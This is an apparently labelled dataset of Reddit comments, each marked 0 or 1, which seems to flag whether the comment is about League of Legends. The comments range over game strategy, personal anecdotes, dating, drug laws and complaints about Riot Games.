1	Every champion in this game can carry, heck, I once carried as a fed Sona (20 Mejai stacks, Rabadons, was one funny game).   To answer your question, yes, ofc Ahri can carry, just like any other AP Carry (they're called AP -Carries- for a reason :D ).   Ahri, like most mages, is strongest mid game, and falls off in damage late game, but that doesn't mean you can't carry, in the end of the day, if you outplay your opponents, you will carry.   Of course, you can't carry every game, some times its just impossible as you get retarded team mates, just how it is, your best option is to keep trying, you can always get better and improve and once you're good enough you'll carry yourself out of your current ELO.
1	My best advice for getting out of the 1100-1400 range is to learn how to dominate your solo lane/jungle. Junglers have HUGE impact in games at lower ELO brackets, so if you can learn how to jungle really well with a strong champion that won't be banned very much, go for it.   The way I got my ELO up was to play Akali or Morg mid if first/second pick, Cait/Ashe/Vayne bot if 3rd pick, WW/Lee/GP jungle if all above roles are taken. Garen and Nasus are great picks to learn how to solo top with, too. Easy to learn and can impact the most important stages of the game. Most players at this skill level have a very hard time making a comeback after losing their lane, so outfarm them and don't allow them to kill you or your tower early.   Only engage the enemy laner/jungler if you know you can kill them or make them b. Don't die for stupid reasons. If you don't know where the enemy jungler is and you are pushed up to their tower, for the love of god don't dive them if you can't kill them safely. I have seen so many people dive, get the kill, and run away with no hp only to get one shot by the enemy jungle. You do not want to trade kills to their jungle for a kill in lane.   Ward everything. If you are jungling, ward your enemy's jungle. It might net you a kill or a stolen buff, while denying him the buff and time alive. Wards will save you from a gank 100% of the time if you place them well/have a predetermined escape plan. Don't go blind! Make sure your team has a CV(always).
0	Here is a story for your.  My friend was in a small local band, they all have really expensive custom guitars, drums, pedals ect.  One night after a show they left all their equipment in a van parked outside their house.  Over night the van got broken into and everything was stolen.   Fast forward two months an ad appears on Craigslist with everything that was stolen with photographs.  So my friend and his band mates instead of calling the police, call the ad.  They arrange a time and plan on meeting at a local college parking lot.   The seller gets out and unloads all the equipment on to the asphalt, my friend acts like he is an interested buyer.  After all the equipment is out.  He says this is stolen and is mine.  Him and 3 other guy pull bats out the the trunk.  The thief jumps in his car and drive away leaving everything in the parking lot.
0	This might be a good time for a
1	The Idea is good but there are other reasons for supports buying tons of wards. Actually Wards are a very good way of carrying your game. The denying of vision and spreading vision on the map gives your team the constant ability of making plays while being surprisingly cheap. 150g for 2 wards will allow your team to survive a teamfight while 125g can make you win it.   If you compare, 1850Gold is the price for a Solari. A good shield for catching the basevalue of one skill ( less or more ) + basevalues on armor, 10% cdr etc. Armor, CDR, Life and a good supportive value. With your gold items, Wards, (Sightstone), this is a usual Way to go. If not, Aegis? Most likely your Jungler gets it. Otherwise you need to get it to get your Team a advantage. 20-25 Wards I would guess are T2 Boots, thats 36 Minutes of Vision if you place 2 on a place without Sightstone. Would you really trade 20-25 Wards for the ability to reveal 5 seconds every minute while getting something like 10-15 ms? or flash cdr? The problem would be most likely that CV is still too weak. Vision has to be cheap, otherwise the support would really be the only one getting it most likely.
0	When I was 13 I came down with a very bad case of pneumonia and I was prescribed some medicine that was in short supply for some reason. Well we sent the script to the Kroger that we usually went to but they didn't have it. I'll never forget what they did at that pharmacy. They then called evey pharmacy in the area to find it. Meanwhile my fever was spiking and thing were getting desperate for me. I could not even open my mouth to talk without throwing up or at least doubling over in pain. Unfortunately one after the other the pharmacies all were unable to get any of the medicine. And then at 11:00pm right as we were getting ready to head to the ER as I was dehydrated and my fever had spiked to a dangerous level the Kroger called and said they found the only pharmacy within 30 minutes that had the medicine and specifically told the pharmacy to stay open for is. They saved my life. We later found out that the lady who had been helping us had stayed 4 hours after her shift was over just to help find us the medicine. Cant thank them enough for basically saving my life.  Needless to say we still go there for our meds
0	My GF had that habit is well. I talked it out with her at one point and it came down to this:   When you are fighting the mooks you look busier. So while it may be something you don't need to pay as much attention to or would happily pause, your controller or keyboard is being clicked and you are staring at the screen. You just look busier.   Then as the game transitions to the cut scene there is that lull where you are not doing anything (and personally this is when I would go to scratch an itch or light a smoke or just not look at the screen). So my GF would start talking, of course as soon as her first sentence is over the game has loaded and now there is Something Important ^^TM  going on.   So we talked, I told her about the calm before the storm and that the less interaction I am putting into the game the more exposition it is probably throwing at me. So now she talks during mook fights and looks for subtitles so she knows she isn't going to be fighting for my attention.   Problem solved, I don't miss cut scenes and she feels better about starting conversations during the times she used to be worried about.
1	I feel like this sometimes too, but most of the time I feel like I either fuck up badly, and makes our chances of winning worse, or take my team on my back and carry them to victory, and neither of those are better options. Obviously when you do bad it's bad cus it affects your game in a negative way, but on the other side it openes up for improvement, and it's easier to become a better player and optimize your game. On the other side if you're doing better then most others, you're playing a game in which you don't belong, there's not much you can learn from to get better, and all you really get out of it is a victory. I always prefer loses where I do great above victories where I do awfull. Then we come to your situation, which I feel like is the ideal one. You're not doing bad, so it's not like you should feel awfull throughout the game, you're not doing amazing either, so you can always look for things to do better, it's like a heaven of perfection where you can chose and pick from what you want to do. Considering your amount of games and the fact that you have since silver felt this way about your games, it seems like you have a pretty even improvement curve. I think as long as you have a self critizising additude, whilst not being to offensive towards yourself, you will be able to do great in the ranking system, and keep improving (honsetly, if you constantly feel like you're not a big factor, negative or positive, you will be exactly where you belong).
0	Vaseline   been using nivea for men, burt bees and chapstick for years. Last night i finally gave into "vaseline". Woke up with my lips healed. 12 hours later, totally healed... im so blown away!
1	I used to be semi-raging every game. What has helped me a lot was restricting myself from using chat until i have released all my rage in real life :P   Example: bot lane dies after 2 minutes in laning phase, irl i tell myself wow these guys are bad. but i restrict myself from saying it in chat until like 10 seconds after it where you have released the rage within you, and instead i try to give them tips in a friendly manner.   This has helped a lot for me, i get honored on a daily bases ^^   (irl im still a raging tryndamere)
0	I'm not sure you'll find a better "catch-all" facial expression.  Everyone will have their variation of this face when this moment happens, but, they will  all  revert back to this face.
0	No, I AM talking about apartheid. And segregation. And sodomy. And interracial marriage. And yes, even the right to explore concious altering substances that don't harm anyone. I'm not saying prohibition is worse than or equal to denying people the right to love who they love. I'm saying that saying "Oh well You should just not have broken the rules" is a stupid thing to say, in any context.   Should I remind you the point of the whole conversation is "Wow, did they really need to go in THAT HARD?" not "should they go in at all?"? Laws are supposed to protect us. What does sending 14 cops to scare the shit out of some teens for smoking pot, or for that matter, putting some teens into the system for smoking pot do to serve the community?   Smoking pot doesn't hurt anybody else, and any "it can affect young peoples chances at life" justification gets blown away the second you stick a criminal record on them.
0	That sub is such a small percentage of the population of reddit, there are people into pretty much everything imaginable. You may as well say "The existence of those people makes me think maybe it's time I quit being human. Maybe."
0	I used to overdraft my account all the time.  As I have grown up I have become a little more responsible with my money and check my accounts almost every day.  However, I recently made a payment for my student loans and chose the wrong account to take it from (you have default accounts listed when you chose your payment method and I was not aware I had already put in the wrong one).  BOOM!  $35 overdraft fee.  And, I am pretty sure I have overdraft protection (the funds come from a different account just in case).  Still charged (fucked) me.
0	As a shy girl who tried asking guys out: I gave up because nobody I went for wanted me. I started off friends with some of them, asked some of them just upon meeting, met some through friends... It was pointless. For a long while no guy wanted me and I decided to become an aromantic hermit. But then a really great guy asked me out and even though we didn't work out, I got my confidence back and tried asking guys out again. It went a lot better and now I'm with my fantastic boyfriend. But the thing is, I experienced a lot of painful rejection and crippling shyness too. When I was in high school, my best friend and my crush dated for two years. You gotta get past that stuff man, especially before you start asking other people to.
1	I shall attempt at an explanation: GP is okay top. His Q, while great (at denying the enemy last hits/out-trading melee champs/securing last hits when being denied or in a 2v1/etc).   It also costs a sheet ton of mana.  And unless you build mana (which you shouldn't do), get mana runes (which you shouldn't do), get blue buff (which you shouldn't do), or get enemy blue buff (which you should do, but how fucking often is that gonna happen?), you can't use your Q often enough to out-harass an enemy with less/no mana issues (something like olaf Q+E).  W is great, essentially a free QSS with some heal. But it doesn't give you enough sustain, unless you are building AP (and holy shit you really shouldn't be building AP). The QSS part is great though.  E is a good AoE buff, no complaints there;  R is a shit storm of random canons. You can ult block someone's path, they can walk right through the ult and still escape taking NO FUCKING DAMAGE. RNG OP.   Overall I'd say his #1 problem (and also the reason why he's a shit jungler) is because he has no hard CC. AoE slow, single target slow, speed up is nice; but it's completely outclassed by Maokai W, Riven W, Skarner R, etc.  In the case of jungler, I think of GP as Shyv. Both have meh ganks, but at least Shyv can counterjungle like a baus, has insane clear times and can run exhaust/smite (because she has R).
1	i just introduced a friend to league of legends. the amount of fun im having while teaching someone the basics of league (what's cs? what's a tank? that sort of stuff). League instantly become more fun for me, because with the basic knowledge i have, i can teach this kid how to play the game.
0	I drunkenly peed in the water fountain just outside our bathroom and had no idea until the RA said that an anon tip said it was a large black person, and apparently I am the only one that matches that description.
0	I had sex for the first time with a girl I really liked a few weeks ago and halfway through we switch positions and she elbows my jaw so hard I fall out of bed, dazed.  I wasn't sure where I was for a few moments.   Of course, I man up and get back into things and she puts her legs around me in missionary and clenches tight and I let loose the most massive fart ever. The bed shakes with my intestinal release.   We both laugh uncontrollably for a few minutes and talk about perhaps that this is a sign we should just move on since things clearly are not going well.   She had six orgasms later that night, and we're still dating three weeks later. So far so good!
1	Your edit says something about Renekton. You want to know why Renekton is popular out of URF but never played in URF? It's the exact same reason that Hecarim is popular in URF but you almost never see him outside of URF. Just like you a lot of people complain about Renekton and how he's not fun to play against, but it won't change that people will play to win in anything that isn't co-op vs ai. Winning and having fun aren't mutually exclusive.
0	Maybe all those people drove past you because they can't change a tire such as yourself.
0	This sound really easy to do. Unless you've been dating them four years and she grabs your phone and starts crying and screaming and stands in front of the door and the only way you can actually call the cops would be to physically assault her for your phone which if you do the neighbors will hear and then the cops will have a 50/50 chance at worst to take her side because she's the one crying and she is probably crazy enough to hit herself to be able to blame you. So... good luck not fucking around with that bullshit, don't stick your dick in crazy. Oh wait, she probably wasn't crazy when you started dating her, she probably just saw a bunch of facebook posts of how all her friends are having babies and getting married, but you don't want to do that yet because you want to start your own business and don't want to allocate your funds towards a child and you don't want to marry somebody who clearly has different long term goals then you. But you happen to love her and she loves you and now what the fuck are you supposed to do at 4 o'clock in the morning when she's saying she's going to kill herself? Then what are you going to do when she starts asking if you have any change? Will you wake up and realize that you are dating a 30 foot sea monster from the prehistoric era and say "goddamn lock ness monster, I ain't giving you no tree fiddy?"
1	MMR Rating, (Match maker rating).  Its a hidden rating you cant see.  How it works in ranked:   Before you switch a tier or division you havent been in before the system wants to make sure your just not on a lucky winning streak.  It makes sure you are ready to move on to the next tier/division.  As you win more, the more consistent lp gains you will see.  Stop focusing on LP and focus on WINS.  If you win more then you lose, the system will decide you are ready to move on to the next division/tier and you will start getting normal Lp gains.
1	Wow this coomunity is stupid as hell. Ofcourse if you invent something you want the recognition for it. Even if he/she don't deserve to get money, or the champion taken out of the game, he/she still deserves to be recognised as the inventor or whatever you call it.  I get mad reading these stupid comments about OP stealing the idea from dota, or that even if he/she came up with the idea there is no point of mentioning it. I've thought of things hundreds of times that I thought was original only to find that people have thought of it before me, it was still an original idea for me, even though someone got to it before me. If I was a part of making a movie I would be in the credits no matter how small the my part was, same with making games.
1	From Riot's perspective, the problem with balancing Kha is the sheer versatility of the champion. At the base level, he is an assassin - one that can do well mid, top, and in the jungle. Very few champions can claim to be good in all three roles. Add on top of that the choice of getting different evolutions and building different stats based on play style and he's a champion unlike any other. Sure there's other assassins that can fill various lanes on the team (like Riven) but the difference with these champions is that they have a very defined playstyle, whereas Kha can build tank and evolve his ult and still function pretty decently as an assassin - type champion but really it's not his focus anymore.   What Riot really needs to figure out is how to incorporate Kha's different playstyles into one coherent champion. His uniqueness lies in his ability to adapt so their ultimate goal is to make a champion that can adapt better than any other in the game.   The way I see it, there's four roles he can adapt into and he can pick three. They are: assassin, poke, resets, utility (his evolutions obviously).   To really define how each person will play Kha, I recommend that players pick a primary role at lvl 6 and secondary/tertiary role at 11 and 16. Let's face it, most people will either want a damage Kha or a tank Kha. The way to do this would be to make his first evolution stronger than the following. Allow him to evolve Q and he have large single target burst. If summoner decide to go poke and resets for 2nd and 3rd evolutions for a full damage Kha, make the second and third a weaker evolution than the first. If summoners decide on utility and tank, let them evolve R first for a stronger evolution. They can then choose what weaker secondary roles they would like.   This allows for Kha to have choices in his builds but at the same time stops him for fully excelling at 3 of his 4 roles. This way, he can't just leap in, deal massive single target damage,  activate his ult and tank large damage, then leap out or on another target. Rather the new Kha may possibly wait with his first evolve Q and second/third w and e on the edges of the fray for a low health priority target. In the meantime, he can poke with spikes that don't just wreck a third of the carry's health. He can then leap in with a low damage reset capable ability, and Q for large amounts of damage. In this way, rather than being a champion with master burst, poke, and leaping for tons of damage; Kha can utilize tons of q damage and small amounts of poke and leap damage to success.   Ex evos (feel free to critisize): Q: 1st evo: missing health, isolation, massive damage. 2nd: isolation, massive damage 3rd: massive damage W:  1st: large damage poke, multiple shots, slow. 2nd: large damage, slow. 3rd: large damage. E: 1st: leap further, resets, possible slow(? ) 2nd: leap further, resets 3rd: resets R: 1st: extended stealth, 3 stealths, damage reduction 2nd: extended stealth, 3 stealths 3rd: extended stealth
0	This is gonna sound really cheesy, but make sure you're always doing something that excites you.   I discovered a passion for designing pretty web pages when I was in high school, and that has since snowballed into a passion for all things web development. I started off learning simple HTML, and now picking up new technologies and techniques excites me. I'm a full-stack web developer, with experience in other areas (sysadmin, devops, engineering)   In the tech field, a passion for learning is key. Technologies are always changing - the internet just turned 25 - so being able to keep up with best practices and staying excited about growing your skillset are my two biggest pieces of advice (and I imagine this applies to just about any field of work, not just tech)   I assume as a high schooler you're looking to go to college. College is a great choice, because you will grow as a human being more than you've ever thought possible. Speaking strictly professionally, however, the experience you'll get from challenging internships and actual work experience will most likely eclipse what you're going to learn in a classroom. After my sophomore year (undergrad) most of what I learned was elective/existential. There are pros and cons to either side of college, but if you dedicate yourself to always being challenged and always growing, you'll be the most successful person possible either way*
1	Well, first of all, you don't want to feed, so you should probably rush Guardian Angel. You might notice that Malphite uses a lot of mana, so buying a Chalice is probably good after this. By then, it'll probably be hard for you to last hit, so buying a Bloodthirster isn't a bad idea, after all the shield stacks with yours. Your abilities might feel a bit lacking, though, so a Rabadon's is next. By this point you will be fairly tanky and do a lot of damage, but you could be doing more damage, so you should buy Lucidity boots. Finish off with Executioner's Calling to ensure that you will win duels against people with lifesteal.
1	True sc2 didn't have promo series but personally I think the promo series gives a lot of people motivation to play harder. In sc2 you play hard but you never know what you need to move up to the next league. I would play game after game and be in the top five or so and it would take so many more games to move up. Granted this was when I started so I probably belonged in bronze but it was harder to see that I was progressing at all. I eventually got to gold after a while but I felt like I started lacking motivation at some point because I was frustrated that I didn't know when I would move up divisions. The league system shows you that you're in division 5 then you move up to 4 then 3...2..1.   In leagues case, you have a nicely defined set of criteria to move up. Prove yourself by gaining 100lp, then show that you're better than your current division by winning a best of three or five. Yeah, it sucks when your promo games happen to be the ones that people dc in, but think about it, would you have cared as much (not saying you didn't care) if it was hypothetically a 12 elo loss? I just feel like people care about their games more now, especially if its their promo series. I think this leads to players trying their best.
1	From the site:   >Hi, For the better part of my life I‘ve been a dreamer. I wanted to be an astronaut, then I wished to be a mad scientist, after that I settled with being a casual scientist. Now I am content being a student in a lab and hopefully, climbing up the ladder when years go by.   >It doesn‘t matter that I lost my ability to dream – I just did that while playing video-games. I used to play a lot of games until I stumbled upon League of Legends – it stole my heart instantly. And this is when I created my first and only account. I cared for it dearly – never had I been banned, always had I watched what I‘m typing even when situations seemed really miserable and telling someone to munch on a big bag of d looked like the only solution. I felt flattered with every „teamwork“ or „honourable opponent“ I got, because, well, I knew I was worth it. This wasn‘t and still isn‘t just a game for me – I grew up together with this account. I learned how to work through difficulties to reach victory: how to be patient with people, how to help out your teammates, because no matter how unskillful they might look – these are the people you need to communicate with in order to reach the goal. I learnt that sometimes it‘s much better to stay silent and sometimes you need to be brave enough to call the shots at difficult moments with all the responsibility that comes together with the power. I remember when I was in my first job interview and I was asked a question: do you think you are able to work in a team? I almost started laughing, because this question seemed so naive when I was picturing teamfights and me looking out for everyone, shifting focus according to the situation, saving your teammates, eliminating enemies, maybe sacrificing someone or even yourself. I think League of Legends really taught me this crucial skill.   >However, not everything I learnt was in Summoner‘s Rift. After finishing high school a lot of my friends chose to study abroad and this game helped us to maintain our friendships – we were sharing our old experiences and creating new ones with the help of LoL. I spent countless nights arguing over the tactics with my best friends, we would be having LoL parties or watching World Championships all together for hours. This account symbolizes my best years – when I was laughing to tears from the hilarious rants enemies wrote, from crazy Blitz‘s hooks, from failed flashes or from stolen Barons with Janna‘s hurricanes. Of course, sometimes, I was so furious about the mistakes that I did, about the firstbloods that could have been averted, about the Zhonyas, which I used to remember after the fights and maybe lie a little when asked about it „was on cd, sorry“.   >Sadly, it is time for me to get a little bit older, leave the little girl that I was in the past and become a responsible woman. I need to write my Master‘s, I need to take care of my grandma, both financially and socially, I need to learn how to get to sleep without hearing „Welcome to Summoner‘s Rift“ at least once.   >Hopefully, you will take care of this beloved account just as I did.   >With love, >Leona
0	You don't get infections if you take care of your eyes and the lenses properly. You can't shower in your lenses, can't sleep in them, have to replace the solution daily if you're wearing monthly contacts, and the list goes on...   It's easy to get used to it, but it's also easy to get careless. I got careless once. I wore my monthly contacts loooong after I should have chucked them out, only replaced the solution in the container when I couldn't remember when it was last replaced, slept in them, kept them in for days at a time...   Then one day I woke up, my left eye was tearing up as fuck, all red, swollen and I couldnt open it. Right eye was the same, but not as bad. It took me an hour to get those lenses out, and fuck me if it wasn't the longest, most painful hour of my life.   I thought maybe it's just irritated, it'll go away, so I sat in my room, lights off, blinds shut, because every time I looked at a light, it felt like someone was stabbing my eye with a rusty nail...   Went to the hospital two days after that, got antibiotic eye drops, and couldn't see properly out of my left eye for two weeks (antibiotics dilated my pupils, so my vision was blurred).   Since that happened, when someone asks "why don't you just sleep in your lenses?" to me it sounds like "why don't you gouge your fucking eyes out   My point is, contact lenses aren't that bad if you use them as instructed.
0	Adding the taxes and having to tip your waiter is genius marketing strategy. It lures you into thinking that something is cheaper than it really is.  This means you spend more when you stop. Think about it when you sit down and look at a menu you see that your entree costs $17.00 but after tip and taxes it really cost ~$22.  Well if we knew it costs $22.00 we might not buy it, but at $17 dollars it sounds great. The same way with sales taxes, in Louisiana the average sales tax is 8.5% this always seems like a little, then I buy something that costs $2,000 and am surprised as  all crap when the salesman tells me $2,170.  I am fiscally responsible, and try to think about all the costs involved in a decision, but I and almost every other american underestimates the amount of sales taxes we pay.  If companies switched and included sales taxes in the prices then according to the price elasticity of demand, the company would pay a portion of the taxes that they are currently paying 0% on.
1	Hey guys,   I am  CBNemesis , I am from  The Netherlands  and I am a designer & plat 3 League player.   My  Twitch channel  is:   Since my channel is mainly about desiging wallpapers for you, I'll show you my  album:   I like to design wallpapers for free for people. Since its live you also can correct some stuff you dont like (as example, you want a different front.) Thats what it makes fun for me to do, I can be interactive with my viewers/users of my wallpapers. I also try to help people with questions about the program I use (photoshop cs6). And of course when you have tips ofr me feel free to share them. I still do it in my spare time for about 3 months now. I dont do an education or something for it.   But sometimes I do stream games aswell. I play with my viewers or friends (depends on viewer count). Since I am from The Netherlands I'll usually talk dutch unless someone asks me to talk in English. (Usually I only have dutch viewers so far). But I am willing to talk in English!   I do not have a schedule yet due to school & work, but I'll look to make one in the future.   Hope to see you soon on my channel and have a nice day!   ~NemesisCB
0	I was woken up by a police officer while passed out in the passenger seat of my car with the keys on the floor. 5 am rolls around and I realized it was a cop outside knocking on the window and pretended to be asleep, cop eventually gets into my vehicle and pokes and prods me with his flashlight until he decide to call EMS. Paramedic arrives I was alert, answered all her questions when she told me I could no longer get in trouble by the cop and she called my parents to pick me up. Cop pissed off knowing I wasn't asleep tells my Mom I have a drinking and possibly drug problem with no evidence besides the earlier interaction.
1	I am a fencer too, not nearly at same level as you OP, but personally I felt the road Guinsoo is talking about is much much much more fency than current Fiora.   Fencing is about speed, finesse, exceptional aim and strategy. You mix a strong defensive with a hyper-fast offensive, when you get an opening, exploiting mistakes and openings of your opponent.   Your defense is active and more like wrestling than a simple parry. You parry, riposte, opponent parry the riposte, and answer with another one, and all the time you spin the blades around each other.   Guinsoo said that she would be moving in and out of range, which sound MUCH more like fencing, where you constant maintain distance and then go in for a trade and then disengage.   He also said she would be more mechanically difficult, this probably means she will have high timing requirements, and will be high paced, and you as a player need to keep up with her speed. From picture of her ulti it sounds like she get disengage on her E. I don't know really what else is needed, everything you wanted checks off.
1	Good amount of flat AD for the price (Only more efficient item in the price range is BF Sword), but on top of that it also has the active, which for Talon means an extra 60% of his AD on his combo every time, bringing his Total AD scaling up to 300% Bonus AD and 260% of his Total AD from 300% Bonus AD and 200% Total AD (2 Autos per combo).   So basically as long as you're ALWAYS using Tiamat when you go in, the item essentially gives you the same benefit as 64 AD on it's own, and even more if you have more AD than that. So it's always going to be a good ~100 or so damage better in one burst combo than BF Sword when you get it early game, which is totally worth the extra 400g since it has an easy build path and scales to be better lategame.
0	SI]( conversions:     170 pounds = 77.11 kg   30 pounds = 13.6 kg   20 pounds = 9.07 kg     > Yeah this is pretty much spot-on. This is anecdotal evidence, but I'll bring it up anyway: >  >  > In college I was in great shape and weighed 170 pounds^(77.11 ^kg)  with a lot of muscle. I had no problem finding girls, and had a couple of girlfriends that were hot. >  >  >  > Two years out from college I had put on nearly 30 pounds^(13.6 ^kg) , and I couldn't find a cute girl to save my life. My personality/confidence hadn't changed at all... in fact I was pretty oblivious to the fact I had gained weight due to the fact I didn't have a scale or even a full-length mirror. But I was ABSOLUTELY doing way poorer in the dating arena. >  >  > After figuring out what a slob I've become, I've been in the process of losing the weight and I've lost 20 pounds^(9.07 ^kg) . Suddenly, girls are interested in me again. >  >
0	My Dad bought my Mum's ring while they were in med school. He came from a really poor background too, so he had virtually nothing to spend on the diamond. It's tiny, but has so much sentiment that when he offered to buy her a nicer one a few years ago she refused.
0	I went through grade school allergic to both Nuts and Chocolate. Valentines and Birthday parties sucked, but you know what? I'm here; I lived through it. Just because I'm allergic to something doesn't mean the next kid has to miss out on his favorite treat on his birthday. Not only that, but I also learned how to identify such things much easier since I saw them and smelled them very frequently, and now that I'm on my own and don't have my parents to hold my hand, I've been able to go allergic-reaction free because I can identify the shit I can't have.
1	Is the site going to be completely nonprofit? I feel like it'll be kind of odd that you're getting people to work for you, and you reaping all the ad revenues from the site. I know you can't pay anyone a salary because of all the taxes and all the paperwork you'd have to fill out, but it'd be cool to give out some RP codes every now and then. Not trying to be a downer or anything just a legitimate concern I have. In fact, I'm also interested in helping out so PM me as well.   Edit: and I know you also have to cover the cost of the domain name so that's probably where the majority of the money is going to go
1	No. The 2nd burger is bad compared to the 1st burger, simple as that. What you are doing there is comparing the 2nd burger to food in general. There is nothing wrong with being bad as long as you acknowledge it and are willing to improve.   Edit:
0	I'm feeling petty, so instead of admitting I fucked up I remember a post of 4chan that went something like this: >Trolling is a art. To which a person replied: "Don't you mean an art?" And thus was replied a picture of a trollface. I've never been particularly fond of memes, but reading that in its original format on 4chan was particularly fun.
1	This is more likely to be a client-side issue. I've been playing league for a while and all the problems I've seen in the comments saying that it's been happening since blahblahblah has never happened to me. I have a decent computer with decent fps (60 fps on low settings/70 ping). I see all skillshots that are used from a bush or over a wall. Never had an invisible arrow or ez ult or invisible spears or morg q's. Not quite sure what to say about this issue.
0	Something crazier happened to me. I was driving back from a Modest Mouse show around midnight and since I live in a smaller town, the highway was empty and you can see anyone coming from either direction easily.   I decided that since I'd never been 100 mph in my shitty little 98 camry, now's the time! So I start getting up to around 85 and there is this car following me, keeping pace as I increase my speed. I get up to about 105 and this car is keeping pace. After about a minute, I slowed down to about 80 and the car whizzes passed me. It was that particular county's sheriff. I bout shit myself but he turned the opposite direction at the end.
0	Having done both construction and harvest work in hot summers, as well as being in my fourth year of college I prefer the labor, which included plenty of overtime.  In college it feels so pointless and like I am not learning too many skills for a hefty price tag.  My classes are scattered throughout the day and the schedule is very irregular.  I come home to do my homework and study when I have to, which believe it or not is actually pretty mentally demanding.  I work  20-25 hours a week as well on campus which is a nice lax job, but takes a lot of time away from other things.  Keep in mind many students walk to campus, which is 30 minutes for me each way.  I don't know about other colleges, but mine is known as, "the hill" for a damn good reason.  Having chronic deep compartment syndrome, that walk FUCKING SUCKS.  Not to mention some of us have families, all have bills, participate in multiple groups basically because we have to, we do our laundry, some of us cook our own/family meals.  I really have no idea what responsibilities you are talking about, but I guaruntee there are plenty of college students working harder than you with more responsibilities.  I even know of a few student who work as full time managers which baffles the shit out of me.   In labor, I had a pretty regular schedule, made good money and felt like I had a purpose, felt no pressure whatsoever, to meet certain people or do anything beyond what I was told.   An average day of college is much more exhausting to me than a 60+ hour a week labor job in the 90-100 degree humid as fuck weather.
1	God damn you protect that AD dealing wizard on your team and you God damn die if it means that little guy gets a 5 man, because your job soldier, your job is to make sure the damage dealer do what he do and what he do is deal that damage. But if you have a good support/another tank you may have to adapt to the role of forcing their carries out of a fight by CC'ing and just jumping straight on them like a bunny in heat.
0	No one makes languages so that they are harder. Languages aren't like a painting, book, movie, etc. You don't sit down and say, "I'm going to make a language and make it logical/illogical," unless you're Tolkien or Zamenhof.   Languages as we speak them today are the products of many years of change, exposure to other (often very different) languages, and the mass migrations and invasions of different cultures and peoples, not to mention shifting technologies that require names and in turn affect the language (Does anyone else use Google to google something?). Look at the changes in English because of its exposure to French and Latin - you could refer to paladins, riders, and cavaliers all on the same medieval battlefield, using words of Latin, Germanic, and French origin in one sentence. Technically, you could have a paladin, rider, and cavalier all on the same horse, because before they took on different cultural meaning, they could all refer to the same thing. Of course a language gets weird when it has other languages (with their own words and rules) edging into its territory. And such is the nature of all languages, not just English. There's a reason that many languages have their own overseeing bodies to maintain linguistic "purity," Sisyphian though the task may be.   Also, there are rules in English that made much more sense a millennium ago. As times passed, we dropped some of the rules, and suddenly we have confusing leftovers from a different system (who/whom, for example). Spellings are messed up partly because the printing press entered England from Germany, which didn't have letters to represent some sounds in English. One can see different presses in England churn out different spellings that took a long time to reach a standard. The problem is, we "froze" our spelling in time while the pronunciations changed. The "gh" ending in "plough" used to pronounced, so at one time that wasn't a confusing spelling. Americans did end up updating that spelling to "plow." Most spellings haven't been updated, and that is especially true in British English. The rules for spelling and grammar don't keep up with the generational or regional shifts in language. Look at the Upper Cities Vowel Shift in the U.S.   Finally, do you think languages seem arbitrary? That's exactly right. They're arbitrarily constructed to represent everything around us  and  the ideas and things that we come up with. Or is that, "the ideas up with which we come?" Thanks for that tricky "rule," Dr. Johnson. Writing is doubly arbitrary - somebody literally did try to make that construction. Nothing we say magically perfectly represents the thing it stands for. Nothing we write would magically make sense to an illiterate speaker of the language we are writing in. We are trained to speak our language (not really, but it's way too complex to explain, and a bit controversial), and we are trained to write. Humans are complex, humans change, and humans make errors. As a projection of our species, language should be expected to be so, too.
0	Hopefully we can restore your faith in humanity and parenting. We respect our belongings and have made sure our child does, too. Toys are not stepped on, and she is not allowed to touch the desktop computers. She does have a hand-me down iPod, and treats it wonderfully. Any toys she brings outside, she shows me so we can make sure together that it comes back in. Any toy that is broken by accident, we fix with superglue. Any toy that is damaged from lack of care on her part is gone, with a lesson on "this is why you can't have nice things."   The exception to this was the day after Christmas, and the dog ate the eyes off her new stuffed horse. She was heartbroken. I took her to the toy store and we bought the same one again, and a few days later we found the eyes from the old one. "Now I can have twins!"   I superglued the eyes back on, and they bulged out of the horse's head. Child says, "I have the perfect name - Nervous!" Cracks me up. I'll have to post a pic.   At any rate, child is so wonderful and selfless all the time to the point where THIS Christmas she left a present out for Santa on Christmas Eve because she was worried that he was so busy bringing presents, he might not get one for himself.   Have faith, there are others like our family out there too.  I promise. :-)
1	I dont get rid of the feeling that they spent the lowest amount of money possible to keep their game running. Just look at the facts:     They pay their employees bad     They need excessive amounts of time to implement features that are mandatory in every other game(voice chat still not implemented, replay system took years)     They need the same amount of time to fix bugs that have been around since Beta     Complains from the community are largely ignored, even IW fixes their weapon balance faster(FMG9 for example) than Riot fixes imbalanced content(see Shen)     Riot makes dozens of promises they somehow do not intend to keep which is unprofessional at best. If I do not have any idea on how to rework stealth I do not promise such a thing. If I realize that I do not have the capacity to produce and balance a new map(magma chamber) I do not promise this content to the community. Same goes for introducing lower priced heroes etc.     Service issues, whether it is server downtime, patch problems, newly introduced bugs, etc. If anyone remembers the months before the EU server split or the same shit happening now on NA with their patches. Its horrible QA or terrible project management both indicators of either incompetence or lack of money invested in these parts of the company.     Forums are still from the last century, region locked while we have something like the WORLD WIDE WEB.     PFE(a simple skin, unimpressive if you put it in relation to the time they needed to finish it, other companies develop entire games during that timespan) took years, also an indicator for terrible project management.     Inequalitys in the treatment of their playerbase. NA > EUW > EUNE. It is worth mentioning that EU is equally big if not bigger than NA.       I could just keep going with that list, my point, also the
0	Well I don't, any more. Not since my C6-7 discectomy about 13 months ago. Now I just have some bulging discs at C4-5 and C5-6. Didn't come to find out until after the operation that I have a family history of this.. My dad found out he has some serious lumbar problems, and apparently my mom's mother had a cervical discectomy when she was in her 20's also. Basically, it was almost just a matter of time before something went in my neck. Actually, the idea that I might have done it to myself is last thing I want to admit. But.. the sad truth is, the  only  time in the 4 or 5 years leading up to the operation that I can think of causing any sort of injury to my cervical spine is that one time I cracked my neck a little too hard and  felt a pop .   Just to clarify: I  did  have a herniated cervical disc, it was probably set to herniate around this point in my life due to my genetics, and it's fairly likely the final straw was when I cracked my neck a little too hard.
1	I think they did this because else World's is going to be as predictable as the all-starts. Asian teams are at the moment just 100% better then the NA/EU scene. We have seen it countless time, and if we send equal amount of teams, then NA/EU will  NOT  have a chance at winning anything close to first place.
